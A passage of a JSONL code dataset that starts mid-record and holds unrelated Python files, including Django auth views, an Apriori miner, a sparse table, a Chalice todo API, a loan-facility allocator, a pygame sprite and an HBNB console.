player_mp4_seek', js)[-1]\n con = json.loads(tem)\n for _dict in con['mediaDefinitions']:\n if 'quality' in _dict.keys() and _dict.get('videoUrl'):\n return _dict.get('videoUrl')\n\n\ndef get_title(html, site):\n if site == \"xvideos\":\n return html.cssselect(\"h2.page-title\")[0].text.strip()\n elif site == \"pornhub\":\n return ''.join(html.xpath('//h1//text()')).strip()\n","sub_path":"app/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} 
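# A minimal usage sketch for the `download_video` Celery task in the record above
# (import path and call-site values are assumptions, not part of the record):
#
#     from app.task import download_video
#     # .delay() serializes the arguments and hands the job to the broker;
#     # a Celery worker then runs download_video(task_id, path) asynchronously.
#     download_video.delay(task_id, '/data/videos')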
+{"seq_id":"219208996","text":"import timeit\nstart = timeit.default_timer()\nimport numpy as np\nfrom gurobipy import *\nnp.set_printoptions(threshold=sys.maxsize)\n\ndef larman_checker(points):\n global warmstart\n global count\n m = Model(\"larman_checker\")\n m.setParam( 'OutputFlag', False )\n \n\n# Introduce Parameters for each point in R^d\n x = points\n #setParam(points, start)\n\n# Binary variables to represent the partition(k will be the \"stolen point\")\n\n p = points.shape[0]\n d = points.shape[1]\n\n\n# Binary variables to represent the partition(k will be the \"stolen point\")\n b = m.addVars(p, vtype=GRB.BINARY)\n c = m.addVars(p,p, lb= 0, ub = 1)\n e = m.addVars(p,p, lb= 0, ub = 1)\n t = m.addVar(lb=0)\n\n \n m.setObjective(t,GRB.MINIMIZE)\n #t must be equal to usage of the stolen points\n c1 = m.addConstr(t == quicksum(c[i,i] + e[i,i] for i in range(p)),\"sp\")\n\n #this constraint makes sure that the convex hulls intersect\n\n c2 = m.addConstrs(((quicksum(x[i,j]*e[i,k] for i in range(p))) == \n (quicksum(x[i,j]*c[i,k] for i in range(p))) for j in range(d) for k in range(p))\n , \"ip\")\n\n #these constraints ensure that the coefficients c and e\n #give rise to a convex combination of the points of x respecting the partition\n c3 = m.addConstrs(((quicksum(c[i,k] for i in range(p))) == 1 for k in range(p)),\"ac1\")\n c4 = m.addConstrs(((quicksum(e[i,k] for i in range(p))) == 1 for k in range(p)),\"ac2\")\n c5 = m.addConstrs((c[i,k] <= b[i] for i in range(p) for k in range(p)),\"cp1\")\n c6 = m.addConstrs((e[i,k] <= 1 - b[i] for i in range(p) for k in range(p)),\"cp2\")\n \n #warmstart using the previous solution as a starting point\n for i in range (len(m.getVars())):\n m.getVars()[i].start = warmstart[i]\n\n m.optimize();\n\n \n \n if m.Status == GRB.OPTIMAL:\n warmstart = []\n for v in m.getVars():\n warmstart.append(v.x)\n t = t.X\n if t !=0:\n count = count + 1\n print(points)\n print(count)\n \n \n \n \n \nA = np.array([[.189,.218,.258,.316,.408,.577],\n [.189,.218,.258,.316,.408,.577],\n [.189,.218,.258,.316,-1.225, 0],\n [.189,.218,.258,-1.265, 0, 0],\n [.189,.218, -1.291, 0, 0, 0],\n [0,-1.309, 0, 0, 0, 0],\n [-1.329, 0,0,0,0,0]])\n \ndef replaceRandom(arr, num):\n temp = np.asarray(arr) # Cast to numpy array\n shape = temp.shape # Store original shape\n temp = temp.flatten() # Flatten to 1D\n inds = np.random.choice(temp.size, size=num) # Get random indices\n temp[inds] = temp[inds] + 1 * np.random.rand(1,1) # Fill with something\n temp = temp.reshape(shape) # Restore original shape\n return temp\n\ncount = 0\ndef lookforexamples(start):\n global warmstart\n warmstart = np.zeros(10)\n global count\n for i in range(1000):\n larman_checker(start)\n start = replaceRandom(start, 5)\nlookforexamples(A)\n\nstop = timeit.default_timer()\n\nprint(stop - start) \n","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"44332568","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n## Author : alexloser\n## Simple Python implementation of the Apriori Algorithm\n\"\"\" This a toy for demonstrate main functions of apriori algorithm \"\"\"\nimport sys\nfrom itertools import chain, combinations\ntry: from _collections import defaultdict\nexcept: from collections import defaultdict\n\n\nclass Apriori(object):\n \"\"\" Simple apriori algotirhm implement, not fast but easy to use \"\"\"\n\n def __init__(self, min_support, min_confidence):\n 
if min_support <= 1e-3 or min_confidence <= 1e-3:\n raise ValueError('invalid parameters!')\n self._mins = min_support\n self._minc = min_confidence\n\n @property\n def name(self): \n return 'Apriori'\n\n def merge(self, item_set, num):\n return frozenset(i.union(j) for i in item_set for j in item_set if len(i.union(j)) == num)\n\n def sub_sets_iterator(self, arr):\n \"\"\" in : ['a', 'b', 'c']\n out: [('a',), ('b',), ('c',), ('a', 'b'), ('a', 'c'), ('b', 'c'), ('a', 'b', 'c')]\n \"\"\"\n return chain(*[combinations(arr, i + 1) for i in range(len(arr))])\n \n def items_with_min_support(self, item_set, record_list, min_support, freqcounter):\n ret = set()\n tmp = defaultdict(int)\n for item in item_set:\n for transaction in record_list:\n if item.issubset(transaction):\n freqcounter[item] += 1\n tmp[item] += 1\n for item, count in tmp.items():\n support = float(count) / len(record_list)\n if support >= min_support:\n ret.add(item)\n return ret\n\n def get_cleaned_records(self, datafile):\n item_set = set()\n record_list = list()\n with open(datafile) as fin:\n for line in fin:\n record = line.strip(' \\r\\n,').split(',')\n transaction = frozenset(record)\n record_list.append(transaction)\n for item in transaction:\n item_set.add(frozenset([item]))\n return item_set, record_list\n\n def run(self, datafile):\n \"\"\" run the apriori algorithm. datafile shoule be csv format\n return:\n - items (tuple, support)\n - rules ((tuple, tuple), confidence)\n \"\"\"\n item_set, record_list = self.get_cleaned_records(datafile)\n freqcounter = defaultdict(int)\n all_combs = list()\n min_supports_prev = self.items_with_min_support(item_set, record_list, self._mins, freqcounter)\n \n ncomb = 2\n while len(min_supports_prev):\n all_combs.append(min_supports_prev)\n min_supports_prev = self.merge(min_supports_prev, ncomb)\n min_supports_cur = self.items_with_min_support(min_supports_prev, record_list, self._mins, freqcounter)\n min_supports_prev = min_supports_cur\n ncomb += 1\n\n print(\"Total combinations:\", len(all_combs));\n\n calc_support = lambda item: float(freqcounter[item]) / len(record_list)\n \n ret_items = []\n for combs in all_combs:\n ret_items.extend([(tuple(item), calc_support(item)) for item in combs])\n\n ret_rules = []\n for combs in all_combs[1:]: # skip all_combs[0]\n for item in combs:\n for s in (frozenset(t) for t in self.sub_sets_iterator(item)):\n remain = item.difference(s)\n if len(remain) > 0:\n confidence = calc_support(item) / calc_support(s)\n if confidence >= self._minc:\n ret_rules.append(((tuple(s), tuple(remain)), confidence))\n\n print(\"Supported items: \", len(ret_items))\n print(\"Confident rules: \", len(ret_rules))\n return ret_items, ret_rules\n\n\n # TODO: rebuild this part better\n def output(self, items, rules, outputfile):\n tmp = {}\n csv = open(outputfile, 'w')\n csv.write('Sets with support >= %.3f\\n' % self._mins)\n for item, support in sorted(items, key=lambda pair: pair[1]):\n if len(item) < 2 or support < self._mins:\n continue\n tmp[item] = support\n csv.write('%-30s' % ' '.join(str(i) for i in item))\n csv.write(' support: %.4f\\n' % support)\n csv.write('\\nRules\\n')\n for rule, confidence in sorted(rules, key=lambda pair: pair[1]):\n pre, post = rule\n s = ' '.join(str(s) for s in pre) + ' => ' + ' '.join(str(s) for s in post)\n csv.write('%-32s confidence: %f\\n' % (s, confidence))\n csv.close()\n\n\nif __name__ == \"__main__\":\n from optparse import OptionParser\n optparser = OptionParser()\n optparser.set_usage('python3 -O %s [OPTIONS]' % 
sys.argv[0])\n\n optparser.add_option('--input', type='str', help='csv file name of train data')\n\n optparser.add_option('--min_support', type='float', default=0.15, help='minimum support threshold(>1e-3)')\n\n optparser.add_option('--min_confidence', default=0.6, type='float', help='minimum confidence threshold(>1e-3)')\n\n optparser.add_option('--output', type='str', help='file name to store results')\n\n (options, args) = optparser.parse_args()\n\n if not options.input or not options.output:\n optparser.error('See help for more details')\n\n print(\"Input file :\", options.input)\n print(\"Output file :\", options.output)\n print(\"Min support :\", options.min_support)\n print(\"Min confidence:\", options.min_confidence)\n \n apriori = Apriori(options.min_support, options.min_confidence)\n\n items, rules = apriori.run(options.input)\n apriori.output(items, rules, options.output)\n\n\n","sub_path":"apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"465200493","text":"import math\nfrom array import array\n\n\nclass MinSparseTable:\n def __init__(self, values):\n self.n = len(values)\n self.p = int(math.log2(self.n))\n\n self.dp = [array(\"l\", (0 for i in range(self.n)))] * (self.p + 1)\n self.it = [array(\"l\", (0 for i in range(self.n)))] * (self.p + 1)\n\n for i in range(self.n):\n self.dp[0][i] = values[i]\n self.it[0][i] = i\n\n self.log2 = array(\"l\", (0 for _ in range(self.n + 1)))\n\n for i in range(2, self.n + 1):\n self.log2[i] = self.log2[i // 2] + 1\n\n for p in range(1, self.p + 1):\n for i in range(self.n + 1 - (1 << p)):\n left_interval = self.dp[p - 1][i]\n right_idx = i + (1 << (p - 1))\n right_interval = self.dp[p - 1][right_idx]\n self.dp[p][i] = min(left_interval, right_interval)\n\n if left_interval <= right_interval:\n self.it[p][i] = self.it[p - 1][i]\n else:\n self.it[p][i] = self.it[p - 1][right_idx]\n\n def query_min(self, l: int, r: int):\n length = r - l + 1\n p = self.log2[length]\n k = 1 << p\n return min(self.dp[p][l], self.dp[p][r - k + 1])\n\n def query_min_idx(self, l: int, r: int) -> int:\n length = r - l + 1\n p = self.log2[length]\n k = 1 << p\n if self.dp[p][l] <= self.dp[p][r - k + 1]:\n return self.it[p][l]\n else:\n return self.it[p][r - k + 1]\n","sub_path":"python/data_structures/sparse_table.py","file_name":"sparse_table.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"34855159","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.shortcuts import redirect, render\nfrom EirSpaceAuth.forms import LoginForm\n\n\n# Create your views here.\n\n\ndef login_view(request):\n if request.method == 'POST':\n credentials = LoginForm(request.POST)\n if credentials.is_valid():\n user = authenticate(username=credentials.cleaned_data['username'],\n password=credentials.cleaned_data['password'])\n if user is not None:\n login(request, user)\n return redirect('home')\n else:\n return redirect('login')\n context = dict()\n context['form'] = LoginForm()\n return render(request, 'auth/login.html', context=context)\n\n\ndef logout_view(request):\n logout(request)\n return redirect('login')\n","sub_path":"PFA/EirSpaceAuth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} 
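# A note on the `MinSparseTable` record above: `[array("l", ...)] * (self.p + 1)` puts
# (p + 1) references to the *same* array object into `dp` and `it`, so writes at one
# level clobber every level. A sketch of the independent-row construction (assumed fix):
#
#     self.dp = [array("l", (0 for _ in range(self.n))) for _ in range(self.p + 1)]
#     self.it = [array("l", (0 for _ in range(self.n))) for _ in range(self.p + 1)]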
+{"seq_id":"567994799","text":"import sys\nimport argparse\nfrom tqdm import tqdm\nfrom get_properties import get_properties\nfrom tqdm import tqdm\n\n\"\"\"\nHow was the tsv file created in the first place?\n- \tThe tsv file is read.\n- \tA dictionary diction in made.\n-\tEvery time the namespace is matched with the name \n\tspace mentioned in the command line argument.\n-\tIf the name space matches the dictionary diction here \n\tis updated with {name of the entity = frequency of occurance}\n\"\"\"\n\n\ndef integrate(namespace, uri_file, output_file=\"integrate.csv\", project_name=\"test_project\", url=\"Enter a valid URL\", input_file=\"Pleaes enter a valid file name\"):\n\tprint(\"Reading the TSV file: \")\n\topen_tsv = open(uri_file, 'r')\n\tread_tsv = open_tsv.readlines()\n\tdiction = {}\n\tfor line in tqdm(read_tsv):\n\t\tline = line.strip().split('\\t')\n\t\tif line[0].split('/')[-2] != namespace:\n\t\t\tcontinue\n\t\tdiction[line[0].split('/')[-1]] = line[1]\n\n\topen_tsv.close()\n\n\t\"\"\"\n\tProcessing the input file. \n\t-\tThe input file is read, out put from get_properties.py\n\t-\tReading lines from the input files.\n\t-\tIterating over every line of the read file.\n\t-\tTaking the name from the line.\n\t-\tif the given name is in the dictionry created above \n\t\tappending the url to the given name and corresponding \n\t\tfrequency to the row entry(read line). Else appending \n\t\tan empty string. \n\t-\tJoining all the elements of the list line with a comma,\n\t\tadding a new line character and then going for the next \n\t\titeration after adding it to a variable final (string addition)\n\t\"\"\"\n\t\n\n\tif (__name__ == \"__main__\"):\n\t\tprint(\"Reading the input file: \")\n\t\topen_inp = open(input_file, 'r')\n\t\tline_inp = open_inp.readlines()\n\n\tif (not __name__ == \"__main__\"):\n\t\tline_inp = get_properties(url=url, output_file=\"get_properties.csv\", project_name = project_name)\n\n\tcnt, tot = 0, 0\n\tfinal = \"\"\n\taccum = []\n\tfor in_line in tqdm(line_inp):\n\t\t\n\t\tline = in_line.strip().split(',')\n\t\tin_line = line[0]\n\t\ttot += 1\n\t\t# if ':' in m:\n\t\t# \tprint \"lol\", m\n\t\tif in_line in diction:\n\t\t\tcnt += 1\n\t\t\tline.append(\"http://dbpedia.org/\" + namespace + \"/\" + in_line)\n\t\t\tline.append(diction[in_line])\n\t\telse:\n\n\t\t\tline.append('')\n\t\t\tline.append('')\n\t\t\t# print in_line\n\n\t\tfinal += \",\".join(line)\n\t\taccum.append(\",\".join(line))\n\t\tfinal += '\\n'\n\n\t\"\"\"\n\tThe string final is the written to the output file name\n\tas given in the command line argument.\n\t\"\"\"\n\t# print final\n\tf = open(project_name+\"/\"+output_file, 'w')\n\tf.write(final)\n\tprint(\"**************************************\")\n\tprint(\"Total number of entity whose URI was found: \"+str(cnt) +\n\t\t\t\"\\nTotal number of entities present: \" + str(tot))\n\treturn accum\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Section to parse the command line arguments.\n \"\"\"\n parser = argparse.ArgumentParser()\n requiredNamed = parser.add_argument_group('Required Arguments')\n requiredNamed.add_argument(\n '--namespace', dest='ns', metavar='ns', help='eg: \"ontology\"', required=True)\n requiredNamed.add_argument('--input_file', dest='inp', metavar='inp',\n help='Output from previous step', required=True)\n requiredNamed.add_argument('--uri_file', dest='uri', metavar='uri',\n help='eg: File which contains uri and number of occurrences of properties', required=True)\n requiredNamed.add_argument('--output_file', dest='out', 
metavar='out',\n help='File in which you want to store output', required=True)\n requiredNamed.add_argument('--project_name', dest='project_name',\n metavar='project_name', help='test', required=True)\n args = parser.parse_args()\n namespace = args.ns\n input_file = args.inp\n uri_file = args.uri\n output_file = args.out\n project_name = args.project_name\n integrate(namespace, uri_file, output_file,\n project_name, \"Enter a valid URL\", input_file)\n pass\n","sub_path":"gsoc/anand/.pipeline_2/integrate.py","file_name":"integrate.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"608676840","text":"import os\n\nfrom chalice import Chalice\nfrom chalice import BadRequestError, NotFoundError\nfrom chalice import CognitoUserPoolAuthorizer\n\nfrom chalicelib import database\n\napp = Chalice(app_name='todo-back')\napp.debug = True\n\nauthorizer = CognitoUserPoolAuthorizer(\n 'ToDoAppUserPool', provider_arns=[os.environ['USER_POOL_ARN']]\n)\n\n@app.route('/', methods=['GET'], authorizer=authorizer)\ndef authed_index():\n # print(os.environ['USER_POOL_ARN'])\n return {'success': True}\n\n\n@app.route('/todos', methods=['GET'], cors=True)\ndef get_all_todos():\n return database.get_all_todos()\n\n\n@app.route('/todos/{todo_id}', methods=['GET'], cors=True)\ndef get_todo(todo_id):\n todo = database.get_todo(todo_id)\n if todo:\n return todo\n else:\n raise NotFoundError('Todo not found.') # 404\n\n\n@app.route('/todos', methods=['POST'], cors=True)\ndef create_todo():\n # リクエストメッセージjson_bodyを修得\n todo = app.current_request.json_body\n\n # 必須項目をチェック\n for key in ['title', 'memo', 'priority']:\n if key not in todo:\n raise BadRequestError(f\"{key} is required.\")\n\n # データを登録\n return database.create_todo(todo)\n\n\n@app.route('/todos/{todo_id}', methods=['PUT'], cors=True)\ndef update_todo(todo_id):\n changes = app.current_request.json_body\n\n # データを更新\n return database.update_todo(todo_id, changes)\n\n\n@app.route('/todos/{todo_id}', methods=['DELETE'], cors=True)\ndef delete_todo(todo_id):\n # データを削除\n return database.delete_todo(todo_id)\n\n# The view function above will return {\"hello\": \"world\"}\n# whenever you make an HTTP GET request to '/'.\n#\n# Here are a few more examples:\n#\n# @app.route('/hello/{name}')\n# def hello_name(name):\n# # '/hello/james' -> {\"hello\": \"james\"}\n# return {'hello': name}\n#\n# @app.route('/users', methods=['POST'])\n# def create_user():\n# # This is the JSON body the user sent in their POST request.\n# user_as_json = app.current_request.json_body\n# # We'll echo the json body back to the user in a 'user' key.\n# return {'user': user_as_json}\n#\n# See the README documentation for more examples.\n#\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"26185582","text":"import os\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\n\nfrom ConfLearning.util.model_to_latex import latex_to_png\nfrom regression import regression\n\npath_data = os.path.join(Path.cwd(), '../data/')\n\ndata = pd.read_pickle(os.path.join(path_data, 'data.pkl'))\n\nnsubjects = 66\nnblocks = 11\nnpairs = 10\nntrials_phase0 = (9, 12, 15, 18)\nntrials_phase1 = (0, 5, 10, 15)\nntrials_phase2 = (9, 12, 15, 18)\n\n# We're including subjects with at least 55% performance\ninclude = 
np.where(np.array(100*data.groupby('subject').correct.mean().values, int) > 55)[0]\nexclude = np.setdiff1d(range(nsubjects), include)\nprint(f\"Subjects with performance < 0.55 (N={len(exclude)}, remain={nsubjects - len(exclude)}): [{', '.join([str(v) for v in exclude])}]\")\n\n\nmap = dict(\n b_designated_absvaluediff='block_difficulty',\n b_valuebase='block_value_level',\n b_ntrials_pre='block_ntrials_phase1',\n b_ntrials_noc='block_ntrials_phase2',\n b_stimulus_pool='block_stimulus_type',\n value_chosen='value',\n ratingdiff21='rating_change',\n)\nd = data.copy().rename(columns=map)\n\n\nps = ['block_difficulty', 'block_value_level', 'block_stimulus_type', 'block_stimulus_type', 'block_ntrials_phase1', 'block_ntrials_phase2', 'value']\nmodel = regression(\n d[~d.rating_change.isna() & (d.block_ntrials_phase2 > 0)],\n # patsy_string='ratingdiff ~ ' + ' + '.join(ps),\n patsy_string='rating_change ~ ' + ' + '.join(ps) + ' + value:block_ntrials_phase2',\n standardize_vars=True,\n ignore_warnings=True,\n model_blocks=True,\n reml=False,\n print_data=False\n)\nskip_var_hack = 'subject Var & 0.023 & 0.034 & & & & \\\\\\\\\\nblock Var & 0.074 & 0.043 & & & & \\\\\\\\\\n'\nlatex_to_png(model, outpath=os.path.join(os.getcwd(), 'regtables', f'{Path(__file__).stem}.png'),\n title=None, DV='rating\\_change', skip_var_hack=skip_var_hack)","sub_path":"stats/ratingdiff_effect_lenghtphase2.py","file_name":"ratingdiff_effect_lenghtphase2.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"232184629","text":"import pygame\r\n\r\nWHITE = (255, 255, 255)\r\nBLUE = (0, 0, 255)\r\nGREEN = (0, 255, 0)\r\nRED = (255, 0, 0)\r\nPURPLE = (255, 0, 255)\r\nBLACK = (0, 0, 0)\r\n\r\nclass enemy(pygame.sprite.Sprite):\r\n \"\"\"\r\n This class represents the enemy\r\n It derives from the \"Sprite\" class in Pygame.\r\n \"\"\"\r\n\r\n def __init__(self, color, width, height, name):\r\n \"\"\" Constructor. Pass in the color of the block,\r\n and its size. \"\"\"\r\n\r\n # Call the parent class (Sprite) constructor\r\n super().__init__()\r\n\r\n # Create an image of the block, and fill it with a color.\r\n # This could also be an image loaded from the disk.\r\n self.image = pygame.image.load(name)\r\n self.image.set_colorkey(BLACK)\r\n\r\n # Fetch the rectangle object that has the dimensions of the image\r\n # image.\r\n # Update the position of this object by setting the values\r\n # of rect.x and rect.y\r\n self.rect = self.image.get_rect()\r\n\r\n # Instance variables that control the edges of where we bounce\r\n self.left_boundary = 10\r\n self.right_boundary = 10\r\n self.top_boundary = 10\r\n self.bottom_boundary = 10\r\n\r\n # Instance variables for our current speed and direction\r\n self.change_x = 0\r\n self.change_y = 0\r\n\r\n def collision_test(self, rect, tiles):\r\n \"Returns the Rect of the tile with which the player collides\"\r\n hit_list = []\r\n for tile in tiles:\r\n if rect.colliderect(tile):\r\n hit_list.append(tile)\r\n return hit_list\r\n\r\n def update(self):\r\n \"\"\" Called each frame. 
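Moves the sprite by its current speed and reverses direction when it crosses the configured boundaries. 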
\"\"\"\r\n self.rect.x += self.change_x\r\n self.rect.y += self.change_y\r\n\r\n if self.rect.right >= self.right_boundary or self.rect.left <= self.left_boundary:\r\n self.change_x *= -1\r\n\r\n if self.rect.bottom >= self.bottom_boundary or self.rect.top <= self.top_boundary:\r\n self.change_y *= -1","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"209012218","text":"from models.models import LoanAssignment, FacilityYield\nfrom common.utils import *\n\n\nclass LoanService(object):\n\n def __init__(self, facilities, covenants):\n self.facilities = facilities\n self.covenants = covenants\n self._facility_yields = {}\n self.log = get_logger(__name__)\n\n def process_loan(self, loan):\n try:\n if not loan:\n return\n\n facility_id, interest_rate = self._find_facility(loan)\n\n if not facility_id:\n return\n\n loan_assignment = self._get_loan_assignment(loan, facility_id, interest_rate)\n if loan_assignment:\n self._add_to_facility_yield(loan_assignment)\n\n except Exception as e:\n self.log.error(e)\n\n return loan_assignment\n\n def get_facility_yields(self):\n return self._facility_yields\n\n # =====================\n # PRIVATE FUNCTIONS\n # =====================\n def _add_to_facility_yield(self, loan_assignment):\n\n key = str(loan_assignment.facility_id)\n facility_yield = self._facility_yields.get(key)\n\n if facility_yield:\n facility_yield.expected_yield += loan_assignment.expected_yield\n else:\n facility_yield = FacilityYield()\n facility_yield.facility_id = loan_assignment.facility_id\n facility_yield.expected_yield = loan_assignment.expected_yield\n\n self._facility_yields.update({key: facility_yield})\n\n def _get_loan_assignment(self, loan, facility_id, interest_rate):\n\n if not loan:\n return\n\n expected_yield = self._calculate_expected_yield(loan.default_likelihood,\n loan.interest_rate,\n loan.amount,\n interest_rate)\n\n loan_asignment = LoanAssignment()\n loan_asignment.loan_id = loan.loan_id\n loan_asignment.facility_id = facility_id\n loan_asignment.expected_yield = expected_yield\n\n return loan_asignment\n\n def _find_facility(self, loan):\n cheapest_interest = None\n found_facility = None\n\n for key, facility in self.facilities.items():\n\n if loan.amount <= facility.amount and loan.interest_rate >= facility.interest_rate:\n\n if self._verify_covenant(loan, facility):\n\n interest = facility.interest_rate * loan.amount\n\n if cheapest_interest is None or interest < cheapest_interest:\n cheapest_interest = interest\n found_facility = facility\n\n if found_facility is None:\n return None, None\n\n found_facility.amount -= loan.amount\n\n return found_facility.facility_id, found_facility.interest_rate\n\n def _verify_covenant(self, loan, facility):\n key = get_key(facility.bank_id, facility.facility_id)\n covenant = self.covenants.get(key)\n if not covenant:\n return False\n else:\n return loan.default_likelihood <= covenant.max_default_likelihood and \\\n loan.state not in covenant.banned_states\n\n def _calculate_expected_yield(self, default_likelihood, loan_interest_rate, loan_amount, facility_interest_rate):\n\n expected_yield = (1 - default_likelihood) * loan_interest_rate * loan_amount \\\n - default_likelihood * loan_amount \\\n - facility_interest_rate * loan_amount\n\n return 
expected_yield\n","sub_path":"loan_serve.py","file_name":"loan_serve.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"57561080","text":"'''\n2(challenge). The method that’s usually used to look up an entry in a phone book is not\nexactly the same as a binary search because, when using a phone book, you don’t always go\nto the midpoint of the sublist being searched. Instead, you estimate the position of the\ntarget based on the alphabetical position of the first letter of the person’s last name.\nFor example, when you are looking up a number for “Smith,” you look toward the middle of\nthe second half of the phone book first, instead of in the middle of the entire book.\nSuggest a modification of the binary search algorithm that emulates this strategy for a\nlist of names. Is its computational complexity any better than that of the standard\nbinary search?\n'''\n\nimport string\n\ndef dict_generator():\n alpha = {}\n num = 0\n for i in list(string.ascii_lowercase):\n alpha[i] = num\n num += 1\n return alpha\n\ndef phone_book_lookup(dict,phone_book):\n name = input(\"Enter the name of the user you would like to search: \")\n first_letter = dict[name[0].lower()]\n if first_letter < 9:\n for key in phone_book.keys():\n key_num = dict[key[0]]\n if first_letter <= key_num:\n for key in phone_book.keys():\n if name.lower() == key.lower():\n return f'{name}:{phone_book[key]}'\n elif first_letter > 18 and first_letter < 26:\n for key in list(reversed(phone_book.keys())):\n key_num = dict[key[0]]\n if first_letter <= key_num:\n for key in phone_book.keys():\n if name.lower() == key.lower():\n return f'{name}:{phone_book[key]}'\n else:\n phone_keys = list(phone_book.keys())\n print(phone_keys)\n right = len(list(phone_keys))\n left = 0\n while left <= right:\n midpoint = (left + right) // 2\n if name == phone_keys[midpoint]:\n return f'{name}:{phone_book[name.lower()]}'\n elif first_letter < dict[phone_keys[midpoint][0]]:\n right = midpoint - 1\n else:\n left = midpoint + 1\n\n\nphone_book = {\n 'aaron':'555-0001',\n 'carson':'555-0002',\n 'frank':'555-0003',\n 'juliet':'555-0004',\n 'pratt':'555-0005',\n 'perry':'555-0010',\n 'reuben':'555-0006',\n 'tim':'555-0007',\n 'victor':'555-0008'\n}\n\nprint(phone_book_lookup(dict_generator(),phone_book))","sub_path":"Practice/binarySearchChallenge.py","file_name":"binarySearchChallenge.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"478059188","text":"from django.template.loader import render_to_string\nfrom email.mime.image import MIMEImage\nimport mimetypes\nfrom django.core.mail import EmailMultiAlternatives\n\n\ndef send_mail(subject, text_content, from_email, to, html_content=None, attachments=[], cc=[], bcc=[]):\n \"\"\"\n This function sends mail using EmailMultiAlternatives and attachs all attachments\n passed as parameters\n \"\"\"\n msg = EmailMultiAlternatives(subject, text_content, from_email, to, cc=cc, bcc=bcc)\n if html_content:\n msg.attach_alternative(html_content, \"text/html\")\n if attachments:\n for att in attachments:\n if att:\n\n mimetype = mimetypes.guess_type(att)[0]\n if str(mimetype) in ('image/jpeg', 'image/pjpeg', 'image/png', 'image/gif'):\n try:\n with open(att, 'r') as f:\n email_embed_image(msg, att, f.read())\n except Exception as e:\n print(e)\n else:\n msg.attach_file(att)\n return msg.send()\n\n\ndef 
send_rendered_mail(subject, template_name, context_dict, from_email, to, attachments=[], cc=[], bcc=[]):\n \"\"\"\n It sends mail after rendering html content and normal text using two different template (.html, .txt) with\n the same name.\n\n :param subject:\n :param template_name: without file extension\n :param context_dict:\n :param from_email:\n :param to:\n :param attachments:\n \"\"\"\n rendered = render_to_string(u\"{}.html\".format(template_name), context_dict)\n text_content = render_to_string(u\"{}.txt\".format(template_name), context_dict)\n return send_mail(subject, text_content, from_email, to, rendered, attachments, cc=cc, bcc=bcc)\n\n\ndef email_embed_image(email, img_content_id, img_data):\n \"\"\"\n email is a django.core.mail.EmailMessage object\n \"\"\"\n img = MIMEImage(img_data)\n img.add_header('Content-ID', '<%s>' % img_content_id)\n img.add_header('Content-Disposition', 'inline')\n email.attach(img)\n","sub_path":"twentytab/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"50976856","text":"#!/usr/bin/python3\n\"\"\"\n this module contains the entry point of the command interpreter\n\"\"\"\n\n\nimport cmd\nimport models\nimport shlex\n\n\nclass HBNBCommand(cmd.Cmd):\n prompt = '(hbnb) '\n\n def do_create(self, arg):\n \"\"\" create a new instances of BaseModel, saves it to a JSON file\n and prints the 'id'.\n \"\"\"\n if arg == \"\":\n print('** class name missing **')\n elif arg not in models.classes:\n print('** class doesn\\'t exist **')\n else:\n new_model = models.classes[arg]()\n models.storage.save()\n print(new_model.id)\n\n def do_show(self, arg):\n \"\"\" Print the string representation of an instance based on the class\n name and 'id'\n \"\"\"\n args = shlex.split(arg)\n try:\n if args[0] not in models.classes:\n raise NameError\n class_name = args[0]\n except IndexError:\n print(\"** class name missing **\")\n return\n except NameError:\n print(\"** class doesn't exist **\")\n return\n\n try:\n expected_id = args[1]\n except IndexError:\n print(\"** instance id missing **\")\n return\n objs = models.storage.all()\n for obj_id, obj in objs.items():\n if obj.__class__.__name__ == class_name and obj.id == expected_id:\n print(obj)\n return\n print(\"** no instance found **\")\n\n def do_destroy(self, arg):\n \"\"\" delete an instance based on the class name and 'id'\n (save the change into the JSON file)\n \"\"\"\n args = shlex.split(arg)\n try:\n if args[0] not in models.classes:\n raise NameError\n class_name = args[0]\n except IndexError:\n print(\"** class name missing **\")\n return\n except NameError:\n print(\"** class doesn't exist **\")\n return\n try:\n expected_id = args[1]\n except IndexError:\n print(\"** instance id missing **\")\n return\n objs = models.storage.all()\n for obj_id, obj in objs.items():\n if obj.__class__.__name__ == class_name and obj.id == expected_id:\n objs.pop(obj_id)\n models.storage.save()\n return\n print(\"** no instance found **\")\n\n def do_all(self, arg):\n \"\"\" print all string representation of all instances based or not on\n the class name\n \"\"\"\n try:\n new_list = []\n objs = models.storage.all()\n if arg == \"\":\n for obj in objs.values():\n new_list.append(obj)\n print(new_list)\n else:\n if arg not in models.classes:\n raise NameError\n for obj_id, obj in objs.items():\n if obj.__class__.__name__ == arg:\n new_list.append(obj)\n print(new_list)\n except NameError:\n 